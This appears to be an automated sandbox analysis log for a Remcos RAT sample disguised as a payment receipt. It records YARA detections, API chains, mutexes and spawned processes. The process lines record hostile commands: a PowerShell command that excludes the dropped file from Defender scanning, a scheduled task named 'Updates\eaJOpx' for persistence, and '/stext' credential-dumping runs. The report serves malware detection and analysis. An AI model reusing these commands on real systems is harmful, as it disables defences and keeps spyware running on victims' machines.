                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: eaJOpx.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, DlfsjvW8qU2neLHntS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, DlfsjvW8qU2neLHntS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, DlfsjvW8qU2neLHntS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@24/14@1/2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,15_2_004182CE
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,18_2_00410DE1
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,15_2_00418758
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A64F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile created: C:\Users\user\AppData\Roaming\eaJOpx.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-OPLFYE
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMutant created: \Sessions\1\BaseNamedObjects\gOVBITLvpzfJPRJ
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile created: C:\Users\user\AppData\Local\Temp\tmpDCEE.tmpJump to behavior
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SwiftCopy_PaymtRecpt121228.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000011.00000002.4041301515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: SwiftCopy_PaymtRecpt121228.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile read: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknownProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\eaJOpx.exe C:\Users\user\AppData\Roaming\eaJOpx.exe
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess created: C:\Users\user\AppData\Roaming\eaJOpx.exe "C:\Users\user\AppData\Roaming\eaJOpx.exe"
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad"
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav"
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess created: C:\Users\user\AppData\Roaming\eaJOpx.exe "C:\Users\user\AppData\Roaming\eaJOpx.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
